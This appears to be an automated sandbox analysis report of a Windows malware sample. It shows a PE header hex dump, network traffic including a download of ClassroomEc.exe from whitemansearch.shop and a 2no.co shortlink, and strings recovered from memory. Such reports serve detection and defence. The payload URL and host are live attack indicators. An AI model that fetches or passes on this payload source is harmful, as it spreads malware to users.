00 00 00 50 45 00 00 4c 01 05 00 b3 be 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7a 02 00 00 ba 00 00 00 00 00 00 f8 7b 02 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 03 00 00 04 00 00 f5 8d 12 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b5 02 00 b4 00 00 00 00 00 03 00 51 40 00 00 00 00 00 00 00 00 00 00 3f 59 12 00 e8 27 00 00 00 50 03 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 78 02 00 00 10 00 00 00 7a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 35 00 00 00 90 02 00 00 36 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 2b 00 00 00 d0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 51 40 00 00 00 00 03 00 00 42 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 15 00 00 00 50 03 00 00 16 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /ClassroomEc.exe HTTP/1.1Host: whitemansearch.shopConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
              Source: global trafficHTTP traffic detected: GET /2ZrVm4 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lm7cla3483ezND7&MD=O4BV1say HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000002512400CC HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
              Source: global trafficHTTP traffic detected: GET /ClassroomEc.exe HTTP/1.1Host: whitemansearch.shopConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: 2no.co
              Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: powershell.exe, 00000004.00000002.2114476212.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: ClassroomEc.exe, 00000008.00000003.2117904067.000000000371C000.00000004.00001000.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2788452497.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2424210617.00000000040B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
